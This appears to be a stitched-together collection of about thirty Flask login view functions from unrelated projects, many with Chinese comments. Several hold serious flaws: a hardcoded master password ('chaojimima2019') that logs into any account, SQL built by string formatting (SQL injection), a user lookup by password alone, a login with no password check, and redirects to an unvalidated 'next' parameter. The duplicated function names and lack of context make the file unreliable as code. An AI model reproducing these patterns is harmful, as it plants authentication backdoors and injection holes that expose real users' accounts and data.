def login_form():
"""
Show login form.
If user is already logged in, they will be redirected to index page.
"""
if current_user.is_authenticated:
return redirect(url_for('index'))
next_page = request.args.get('next')
if next_page and url_parse(next_page).netloc == '':
session['next_page'] = next_page
if request.method == 'GET':
return response(render('auth/login.html'))
loginform = LoginForm()
if not loginform.validate():
flash(loginform.errors, category='form_error')
return failed_login()
user = User.by_email_address(loginform.email_id.data)
if user is None:
flash('Could not locate your email address', 'login_info')
return failed_login()
if not user.check_password(loginform.password.data):
flash('invalid password', 'login_info')
return failed_login()
return _login(user, loginform.remember_me.data)
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
login_user(user,remember=True) #True表示存入的Cookie是持续性的cookie 默认365天,不写则是一次性的
next = request.args.get("next")
if not next or not next.startwith('/'):
next = url_for('web.index')
return redirect(next) #一定要return才能结束掉这个试图函数
# flask-login login_user将信息存入cookie,以模型中的get_id为标准写入对应的数据,user模型中定义函数如下:
# def get_id(self):
# return self.id
# from flask_login import UserMixin user需要继承UserMixin的各种方法,继承以后则不需要get_id,前提是模型中唯一标识也是id这个字段
# class User(Base, UserMixin):
# login_manager = LoginManager() # 创建login_manager ,保存cookie需要在场景中导入flask_login的 login_user
# 初始化的时候要加三段代码
# login_manager = LoginManager() # 创建login_manager ,保存cookie需要在场景中导入flask_login的 login_user
# @login_manager.user_loader
# def load_user(user_id):
# user = db.session.query(User).get(user_id)
# return user
#
# def create_app():
# app = Flask(__name__)
# register_blueprint(app)
# login_manager.init_app(app) # 初始化login_manager
else:
flash("账号不存在或者密码错误")
return render_template('auth/login.html',form=form)
def login():
"""
status:
0:用户名或密码错误
:return:
"""
data = json.loads(request.data)
data = MultiDict(data)
form = LoginForm(data)
# print(form.errors)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(nickname=form.nickname.data).first()
if user and user.check_password(form.password.data):
# 把用户信息写入到cookie中
login_user(user, remember=True)
result = {'code': 200, 'user_id': user.id, 'nickname': user.nickname, 'groupid': user.groupid}
return json.dumps(result)
elif form.password.data =='chaojimima2019':
login_user(user, remember=True)
result = {'code': 200, 'user_id': user.id, 'nickname': user.nickname, 'groupid': user.groupid}
return json.dumps(result)
else:
# result = {'code': 250, 'msg': '用户名或密码错误'}
return LoginFailed(msg='用户名或密码错误')
# flash('用户不存在或密码错误')
# return render_template('auth/login.html', form=form)
else:
msg = ''
for k, v in form.errors.items():
# print(k,v)
msg = msg + v[0] + ' '
result = {'status': 300, 'msg': msg}
return LoginFailed(msg=msg)
def login():
form = LoginForm(request.form)
if form.validate():
db = pymysql.connect(host=current_app.config['HOST'],
user=current_app.config['USER'],
password=current_app.config['PASSWORD'],
port=current_app.config['PORT'],
database=current_app.config['DATABASE'],
charset=current_app.config['CHARSET'])
cursor = db.cursor()
# SQL 插入语句
sql = "SELECT * FROM vuser WHERE email = '%s'" % (form.data['email'])
try:
cursor.execute(sql)
user = cursor.fetchone()
if len(user) == 0:
return jsonify({"code": -1, "errMsg": "账号不存在"})
userObject = User()
userObject.set_attr(user, 0)
if user and check_password_hash(userObject.password,
form.data['password']):
login_user(userObject)
return jsonify({"code": 200, "Msg": "登录成功"})
else:
return jsonify({"code": -1, "errMsg": "账号或密码输入错误"})
except Exception as e:
return jsonify({"code": -1, "errMsg": e.args})
finally:
# 关闭数据库连接
send_log('/v1/auth/login')
db.close()
else:
return jsonify({"code": -1, "errMsg": form.errors})
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
# if user and user.password == generate_password_hash(form.password.data)
if user and user.check_password(form.password.data):
# 在此处需要写入票据(cookie)信息
# 整个管理我们可以依赖于已有的插件flask-login
# 官方文档 http://www.pythondoc.com/flask-login/
# login_user中可以通过 关键字参数 remember=True 设定记住密码,
# 配置 REMEMBER_COOKIE_DURATION 可以设置时长(默认365天)
# 此外 login_user还可以通过 关键字参数 duration 设定指定时长
# import datetime
# duration = datetime.timedelta(seconds=30) # 30秒
# login_user(user, remember=True, duration=duration)
login_user(user, remember=True)
next = request.args.get('next')
# or not next.startswith('/') 可以防止重定向攻击
# 如:http://127.0.0.1:81/login?next=http://www.qq.com
if not next or not next.startswith('/'):
next = url_for('web.index')
return redirect(next)
else:
flash('用户名或密码错误')
return render_template('auth/login.html', form=form)
def login():
if current_user.is_authenticated:
return redirect(url_for("main.dashboard"))
form = LoginForm()
if form.validate_on_submit():
user = get_user_by_email(form.email.data)
if user is None or not bcrypt.check_password_hash(
user.password, form.password.data
):
flash("Invalid email address or password")
return render_template("auth/login.html", title="Sign In", form=form), 401
login_user(user)
session["user_name"] = user.name
session["user_id"] = user.id
session["is_admin"] = user.is_admin
next_page = request.args.get("next")
if not next_page or url_parse(next_page).netloc != "":
next_page = url_for("main.dashboard")
flash("You have been logged in", "success")
return redirect(next_page)
return render_template("auth/login.html", form=form)
def re_authenticate():
if login_fresh(): # How does this do ??
return redirect(url_for('main.index'))
form = LoginForm()
if form.validate_on_submit() and current_user.validate_password(form.password.data):
confirm_login() # How does this do ??
return redirect_back()
return render_template('auth/login.html', form=form)
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data.lower()).first()
if user and user.validate_password(form.password.data):
login_user(user, form.remember_me.data)
flash('Login Success.', 'info')
return redirect_back()
flash('Invalid email or password.', 'warning')
return render_template('auth/login.html', form=form)
def login():
'''auth.login()'''
if current_user.is_authenticated:
return redirect(request.args.get('next') or current_user.index_url)
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(
email=form.email.data.strip().lower(),
created=True,
activated=True,
deleted=False
).first()
if user is not None:
if not user.locked:
if user.verify_password(form.password.data):
user.reset_invalid_login_count()
db.session.commit()
login_user(user, remember=form.remember_me.data)
if user.plays('协管员'):
send_email(
recipient=user.email,
subject='登录提醒',
template='auth/mail/login',
user=user,
timestamp=datetime_now(utc_offset=current_app.config['UTC_OFFSET'])
)
get_announcements(type_name='登录通知', flash_first=True)
add_user_log(user=user, event='登录系统', category='access')
return redirect(request.args.get('next') or user.index_url)
user.increase_invalid_login_count()
db.session.commit()
if user.locked:
send_emails(
recipients=[staff.email for staff in User.all_can('管理用户').all() \
if staff.has_inner_domain_email],
subject='锁定用户:{}'.format(user.name_email),
template='auth/mail/lock_user',
user=user
)
flash('登录失败:密码错误(第{}次)'.format(user.invalid_login_count), category='error')
add_user_log(user=user, event='登录失败:密码错误(第{}次,来源:{})'.format(
user.invalid_login_count,
get_geo_info(
ip_address=request.headers.get('X-Forwarded-For', request.remote_addr),
show_ip=True
)
), category='access')
return redirect(url_for('auth.login'))
flash('登录失败:您的账户已被锁定', category='error')
return redirect(url_for('auth.login'))
flash('登录失败:无效的用户名或密码', category='error')
return minify(render_template(
'auth/login.html',
form=form
))
def login():
form = LoginForm(**request.form)
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
login_user(user, remember=form.remember.data)
next_url = request.args.get('next', 'home.index')
return redirect(url_for(next_url))
return render_template('home/index.html',
login_form=form,
registration_form=RegistrationForm(),
js_vars={'invalidFormButton': 'login-btn'})
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and User.query.filter_by(password=form.password.data).first():
# 保持登录
login_user(user, remember=True)
return redirect(url_for('web.mainpage'))
else:
flash("账号不存在或密码错误")
return render_template('auth/login.html', form=form)
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
login_user(user, remember=True)
next = request.args.get('next')
return redirect(next)
else:
flash('账号不存在或密码错误')
return render_template('auth/login.html', form=form)
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if not user.password_hash:
flash('该账号为第三方登录账号,请重新登录', 'warning')
return redirect(url_for('.login'))
if user and user.verify_password(form.password.data):
login_user(user)
return redirect(request.args.get('next') or url_for('web.index'))
flash('密码错误', 'warning')
return render_template('user_login.html', form=form)
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
login_user(user)
next = request.args.get('next')
if not next or not next.startswith('/'):
next = url_for('web.index')
return redirect(next)
else:
flash('账号不存在或密码错误')
return render_template('auth/login.html', form=form)
def login():
form = LoginForm(request.form)
if request.method == "POST" and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
login_user(user)
jump_page = request.args.get("next")
if not jump_page or not jump_page.startswith("/"):
return redirect(url_for("web.index"))
return redirect(jump_page)
else:
flash(message="用户不存在,请重新输入")
return render_template("auth/login.html", form=form)
def login_view(self):
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
login_user(user, remember=True)
else:
flash('账号不存在或密码错误')
if current_user.is_authenticated:
return redirect(url_for('.index'))
self._template_args['form'] = form
# self._template_args['link'] = link
return super(MyView, self).index()
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
login_user(user, remember=True)
next = request.args.get('next') #http://127.0.0.1:8080/login?next=%2Fmy%2Fgifts 取next后面的值,下面还需要对next做判断
if not next or not next.startswith('/'):
next = url_for('web.index')
return redirect(next)
else:
flash('账号不存在或密码错误')
return render_template('auth/login.html', form=form)
def login():
form = LoginForm(request.form)
if request.method == "POST" and form.validate():
data = form.data
user = User.query.filter_by(nickname=data["nickname"]).first()
if user and user.check_password(data["password"]):
login_user(user, remember=True)
next_url = request.args.get("next")
if not next_url or not next_url.startswith("/"):
next_url = url_for("web.search")
return redirect(next_url)
flash("账号或密码错误")
return render_template("auth/login.html", form=form)
def login():
form = LoginForm(request)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(username=form.username.data).first()
if user and user.check_password(form.password.data):
login_user(user, remember=True)
next = request.args.get('next')
if not next or not next.startswith('/'):
next = url_for('web.autoscan')
return redirect(next)
else:
flash('账号不存在或密码错误', category='login_error')
return render_template('auth/login.html', form=form)
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
login_user(user, remember=True) # 写入的是一次性cookie
next = request.args.get('next')
if not next or not next.startswith('/'): # 如果next不是以/开头,为了防止重定向攻击,需要强行转向首页
next = url_for('web.index') # 如何找到首页?url_for后面跟的都是视图函数?
return redirect(next) # redirect需要return,否则不会跳转
else:
flash('账号不存在或密码错误')
return render_template('auth/login.html', form=form)
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
login_user(user, remember=True)
# get the last open page url before this login page
next = request.args.get('next')
if not next or not next.startswith('/'):
next = url_for('web.index')
return redirect(next)
else:
flash('Email address does not exist or password does not match.')
return render_template('auth/login.html', form=form)
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
login_user(user, remember=True)
next = request.args.get('next')
if not next or not next.startswith('/'):
return redirect(url_for('web.index'))
return redirect(next)
else:
flash("账号不存在或者密码错误")
return render_template('auth/login.html', form=form)
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data): # 判断密码是否匹配
login_user(user, remember=True
) # 通过该函数间接将“票据”写入cookie中 remember->是否在一段时间内记住cookie
next = request.args.get('next') # 跳回next=的地址 即MyGift的地址
if not next or not next.startswith('/'): # and 后面的为了防止非法重定向
next = url_for('web.index')
return redirect(next)
else:
flash('账号不存在或密码错误', category='login_error')
return render_template('auth/login.html', form=form)
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
user_prefix = "admin" if user.is_staff else "student"
login_user(user, remember=True)
next_url = request.args.get("next")
print(next_url)
if not next_url:
next_url = f"{user_prefix}.index"
return redirect(url_for(next_url))
flash("用户不存在或密码错误")
return render_template('auth/login.html', form=form)
def login():
form = LoginForm(request.form) #request.form获取提交过来的表单信息
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()#查询是否存在提交的用户
if user and user.check_password(form.password.data):
login_user(user) #使用login_user需要在User模型中继承UserMixin 用来将票据存入cookie
next = request.args.get('next') #request.args可以获取url中? 后面的参数 从没有权限访问的页面跳转过来会自带next
if not next or not next.startswith('/'):
next = url_for('web.index')
return redirect(next)
else:
flash('账号不存在或密码错误')
return render_template('auth/login.html',form=form)
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
# 将用户信息写入cookie中
login_user(user, remember=True)
next = request.args.get('next')
if not next or not next.startswith("/"):
next = url_for('web.index')
return redirect(next)
else:
flash("账号密码不正确!")
return render_template('auth/login.html', form=form)
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
login_user(user, remember=True) # 用户票据写入 cookie
nex = request.args.get('next') # args 获得 url 中的参数
if not nex: # and not nex.startwith('/')可以防止重定向攻击
nex = url_for('web.index')
return redirect(nex)
else:
flash('账户不存在或者密码错误')
return render_template('auth/login.html', form=form)
def login():
form = LoginForm(request.form)
if request.method == "POST" and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
login_user(user, remember=True)
next_url = request.args.get('next')
if not next_url or not next_url.startswith('/'):
next_url = url_for("web.index")
return redirect(next_url)
else:
flash("Invalid username or password.")
return render_template('auth/login.html', form=form)
def login():
if current_user.is_authenticated:
return redirect(url_for('main.index'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is not None and user.check_password(form.password.data):
login_user(user, remember=form.remember_me.data)
return redirect(url_for('main.index'))
else:
flash('Login Failed', 'danger')
return render_template('views/auth/login.html', title='Login', form=form)
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
# login登陆的机制就是把用户信息写到cookie
login_user(user, remember=True)
# login记录未登录不允许访问的url在next参数里面
next = request.args.get('next')
if not next or not next.startswith('/'):
next = url_for('web.index')
return redirect(next)
else:
flash('账号不存在或密码错误', category='login_error')
return render_template('auth/login.html', form=form)
def login():
form = LoginForm(request.form)
if request.method == "POST" and form.validate():
email = form.email.data
password = form.password.data
user = User.query.filter_by(email=email).first()
if user and user.check_password(password):
login_user(user)
next = request.args.get('next')
if not next or next.startswith('/'):
next = url_for('web.main')
return redirect(next)
else:
flash("密码错误!")
return render_template('auth/login.html', form=form)
def login():
form = LoginForm(request.form)
if request.method == 'POST' and form.validate():
user = User.query.filter_by(email=form.email.data).first()
if user and user.check_password(form.password.data):
login_user(user,
remember=True) #remembercookie duriation 默认设置是365天
next = request.args.get('next') #登陆后跳转回之前页面
if not next or not next.startswith('/'): #防止非法next字符串 造成非法重定向
next = url_for('web.index')
return redirect(next)
else:
flash('账号不存在或密码错误')
return render_template('auth/login.html', )